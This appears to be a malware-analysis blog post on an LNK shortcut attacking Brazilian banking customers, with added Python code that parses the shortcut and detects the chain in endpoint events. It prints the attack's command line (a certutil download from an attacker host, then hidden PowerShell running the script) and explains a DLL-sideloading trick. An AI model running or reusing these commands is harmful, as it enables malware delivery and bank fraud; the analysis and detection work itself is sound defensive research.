Tuesday, 12 June 2018

LNK Files targeting Banking Users in Brazil

On June 8th 2018, I found an interesting instance of a LNK file which was used to target Banking users in the Brazil region.

ZIP File Hash: e8cf34e5b319769da611441cfee9f6f5
Filename: 001745-Tabela-Preco-Fipe.lnk
MD5 hash: ea31baebb8b99ddd858865098e704521

The LNK file has its Target set to the following command line:

C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f "hxxp://www.aapxommkbfwaxwnngwasvipsoaaqhiqcavibutioyxcaivucabputn.palestraeducativas.info/08-06-2018m/pls.vbs" %temp%\pls.vbs && cd %temp% && rename "pls.vbs" "NjPrcgTKRDVWtxrpwMEMXUgWzVQ.vbs && powershell.exe -WindowStyleHidden -Command wscript NjPrcgTKRDVWtxrpwMEMXUgWzVQ.vbs

The above command line performs the following main operations (cmd.exe is started with /V, which enables delayed environment-variable expansion, and /C, which runs the command string and exits):

1. Downloads a VBScript from the URL: hxxp://www.aapxommkbfwaxwnngwasvipsoaaqhiqcavibutioyxcaivucabputn.palestraeducativas.info/08-06-2018m/pls.vbs and drops it to %temp%\pls.vbs. The download to disk is performed with certutil.exe (-urlcache -split -f), a signed Windows utility abused here as a living-off-the-land downloader.

2. Renames the dropped VBScript from pls.vbs to NjPrcgTKRDVWtxrpwMEMXUgWzVQ.vbs

3. Executes the VBScript with wscript, which is itself launched through powershell.exe with a hidden window style requested, so that the user does not see a console.
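As an added example (not part of the original post and not the author's tooling), the following Python script parses the ShellLinkHeader and StringData of a .lnk file according to the MS-SHLLINK layout and then splits the recovered cmd.exe argument string on && to pull out the download URL, the dropped path and the LOLBin hand-offs. The .lnk bytes are constructed inline from the post's command line: the closing quote of the rename and the space in -WindowStyle Hidden are normalized, and the target is stored as a relative path in StringData (a real file may instead carry it in LinkTargetIDList or LinkInfo, which this parser skips by their size fields). Nothing is downloaded or executed.

```python
import re
import struct

# LinkFlags bits from the MS-SHLLINK specification (ShellLinkHeader).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# Every .lnk carries this LinkCLSID: {00021401-0000-0000-C000-000000000046}.
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SHOW_COMMANDS = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}
URL_RE = re.compile(r"""h(?:tt|xx)ps?://[^\s"'&]+""", re.IGNORECASE)   # live or defanged


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand and the StringData strings of a Shell Link.
    LinkTargetIDList and LinkInfo are skipped using their own size fields."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("bad HeaderSize: not a Shell Link")
    if data[4:20] != LINK_CLSID:
        raise ValueError("bad LinkCLSID: not a Shell Link")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]

    def read_string() -> str:
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        return raw.decode("utf-16-le" if width == 2 else "latin-1")

    out = {"show_command": SHOW_COMMANDS.get(show_cmd, hex(show_cmd))}
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            out[key] = read_string()
    return out


def extract_indicators(arguments: str) -> dict:
    """Split a cmd.exe argument string on && and pull out URLs, dropped
    file paths and the LOLBin hand-offs used by this sample."""
    stages = [s.strip() for s in arguments.split("&&")]
    ind = {"stages": stages, "urls": URL_RE.findall(arguments),
           "dropped": [], "techniques": []}
    for stage in stages:
        low = stage.lower()
        if "certutil" in low and "-urlcache" in low:
            ind["techniques"].append("certutil download")
            ind["dropped"].append(stage.split()[-1])   # -f <url> <dest>: dest is last
        elif low.startswith(("rename ", "ren ")):
            ind["techniques"].append("rename dropped file")
        elif "powershell" in low and ("wscript" in low or "cscript" in low):
            ind["techniques"].append("powershell launches script host")
    return ind


def build_lnk(relative_path: str, arguments: str, show_cmd: int = 7) -> bytes:
    """Build a minimal Unicode .lnk (constructed sample, not the real file)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    hdr = struct.pack("<I", 0x4C) + LINK_CLSID + struct.pack("<II", flags, 0x20)
    hdr += b"\x00" * 24                                # Creation/Access/Write times
    hdr += struct.pack("<IIIH", 0, 0, show_cmd, 0)     # FileSize, IconIndex, ShowCommand, HotKey
    hdr += b"\x00" * 10                                # Reserved1, Reserved2, Reserved3

    def s(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return hdr + s(relative_path) + s(arguments)


# Constructed sample modelled on the post's LNK; quoting normalized, relative target path.
SAMPLE_ARGS = (
    '/V /C certutil.exe -urlcache -split -f "hxxp://www.aapxommkbfwaxwnngwasvipsoaaqhiqcavibutioyxcaivucabputn.palestraeducativas.info/08-06-2018m/pls.vbs" %temp%\\pls.vbs '
    '&& cd %temp% && rename "pls.vbs" "NjPrcgTKRDVWtxrpwMEMXUgWzVQ.vbs" '
    '&& powershell.exe -WindowStyle Hidden -Command wscript NjPrcgTKRDVWtxrpwMEMXUgWzVQ.vbs'
)
SAMPLE_LNK = build_lnk("..\\..\\..\\Windows\\System32\\cmd.exe", SAMPLE_ARGS)


def triage(data: bytes) -> dict:
    info = parse_lnk(data)
    info["indicators"] = extract_indicators(info.get("arguments", ""))
    return info


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_LNK), indent=2))
```

ShowCommand is worth surfacing alongside the arguments: a value of 7 (SW_SHOWMINNOACTIVE) on a shortcut that launches cmd.exe is a common trick to keep the console off screen, and it lives in the header even when the StringData has been obfuscated.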

Analysis of the VBScript

Because the attack targets Brazilian banking users, the VBScript performs several environment checks before continuing execution.

It checks for the presence of the following directories on the file system:

%PROGRAMFILES%\Diebold
%PROGRAMFILES%\AppBrad
%APPDATA%\..\Local\Aplicativo Itau
C:\Sicoobnet

These are install locations of Brazilian banking client software and security modules (the Diebold/GAS Tecnologia security module and the Bradesco, Itaú and Sicoob applications), so their presence tells the script that the machine belongs to a customer of one of the targeted banks. If any of the above paths does not exist on the machine, the VBScript terminates.

If the above checks pass, the script continues with the following main actions:

1. Downloads a ZIP file from the URL: hxxp://www.aapxommkbfwaxwnngwasvipsoaaqhiqcavibutioyxcaivucabputn.palestraeducativas.info/08-06-2018m/iWaPZOE.zip
2. Extracts the contents of the ZIP file to the %temp% directory.
3. Renames the executable from iWaPZOE.exe to a randomly generated name, and renames the DLL from RrpzTAc.dll to IVIEWERS.dll.
4. Executes the renamed binary.

DLL Hijacking

The downloaded binary is a copy of OLEView (Microsoft's OLE/COM Object Viewer), which loads a DLL named IVIEWERS.dll at runtime. Because the loader resolves the DLL by name and searches the application's own directory first, the malicious IVIEWERS.dll dropped next to the executable in %temp% is found and loaded in place of the legitimate one: DLL search-order hijacking, also called DLL sideloading. The payoff for the attacker is that the malicious code runs inside a process backed by a legitimate Microsoft executable, which helps it blend in with application whitelisting and process-name-based detection.
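To show what the VBScript stage and the sideload look like in endpoint telemetry, here is an added example (mine, not the author's) of detection logic run over constructed Sysmon-style ProcessCreate and ImageLoad events modelled on the chain in this post. The user name, the temp path, the random executable name qwzpLrm.exe and the unsigned status of the dropped IVIEWERS.dll are assumptions; real telemetry would carry http:// rather than the defanged hxxp://, and the rule accepts both.

```python
import ntpath
import re

# Constructed Sysmon-style events (EventID 1 = ProcessCreate, 7 = ImageLoad)
# modelled on the chain described in the post. Paths, user name, the random
# executable name and the Signed field are invented for the example.
TEMP = r"C:\Users\victim\AppData\Local\Temp"
URL = "hxxp://www.aapxommkbfwaxwnngwasvipsoaaqhiqcavibutioyxcaivucabputn.palestraeducativas.info/08-06-2018m/"
CHAIN = ('cmd.exe /V /C certutil.exe -urlcache -split -f "' + URL + 'pls.vbs" ' + TEMP + r'\pls.vbs'
         ' && cd ' + TEMP + ' && rename "pls.vbs" "NjPrcgTKRDVWtxrpwMEMXUgWzVQ.vbs"'
         ' && powershell.exe -WindowStyle Hidden -Command wscript NjPrcgTKRDVWtxrpwMEMXUgWzVQ.vbs')
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": CHAIN},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'certutil.exe -urlcache -split -f "' + URL + 'pls.vbs" ' + TEMP + r'\pls.vbs'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -WindowStyle Hidden -Command wscript NjPrcgTKRDVWtxrpwMEMXUgWzVQ.vbs"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "wscript NjPrcgTKRDVWtxrpwMEMXUgWzVQ.vbs"},
    {"EventID": 1, "Image": TEMP + r"\qwzpLrm.exe",              # renamed OLEView copy
     "ParentImage": r"C:\Windows\System32\wscript.exe", "CommandLine": TEMP + r"\qwzpLrm.exe"},
    {"EventID": 7, "Image": TEMP + r"\qwzpLrm.exe",
     "ImageLoaded": TEMP + r"\IVIEWERS.dll", "Signed": "false"},
    # Benign control: a system process loading a signed DLL from System32.
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\ntdll.dll", "Signed": "true"},
]

WRITABLE_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\users\\public\\")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def in_writable_dir(path: str) -> bool:
    low = path.lower()
    return any(d in low for d in WRITABLE_DIRS)


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def detect(events) -> list:
    """Run the chain rules over a list of events; return (rule, evidence) pairs."""
    hits = []
    for e in events:
        if e["EventID"] == 1:
            img, parent = base(e["Image"]), base(e["ParentImage"])
            cmd = e["CommandLine"].lower()
            # LNK stage 1: certutil fetching a URL to disk.
            if img == "certutil.exe" and "-urlcache" in cmd and re.search(r"h(?:tt|xx)ps?://", cmd):
                hits.append(("certutil_download", e["CommandLine"]))
            # LNK stage 3: powershell handing a .vbs to a script host. Keyed on the
            # extension, since the script name is randomized before execution.
            if img in SCRIPT_HOSTS and parent == "powershell.exe" and ".vbs" in cmd:
                hits.append(("powershell_launches_script_host", e["CommandLine"]))
            # VBScript stage: the script host starting a binary out of a writable dir.
            if parent in SCRIPT_HOSTS and in_writable_dir(e["Image"]):
                hits.append(("script_host_spawns_temp_binary", e["Image"]))
        elif e["EventID"] == 7:
            # Sideload: an unsigned DLL loaded from the loading process's own writable directory.
            same_dir = ntpath.dirname(e["Image"]).lower() == ntpath.dirname(e["ImageLoaded"]).lower()
            if same_dir and in_writable_dir(e["ImageLoaded"]) and e.get("Signed", "false").lower() != "true":
                hits.append(("unsigned_dll_sideload_from_writable_dir", e["ImageLoaded"]))
    return hits


def rule_names(events) -> set:
    return {rule for rule, _ in detect(events)}


if __name__ == "__main__":
    for rule, evidence in detect(EVENTS):
        print(f"{rule:40s} {evidence}")
```

The sideload rule deliberately does not key on the name IVIEWERS.dll: the same pattern (legitimate executable plus unsigned DLL in a user-writable directory, DLL loaded from that directory) covers whichever application the next campaign picks.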

I'll post more details of the malicious activities performed by the DLL in a follow up post.

c0d3inj3cT
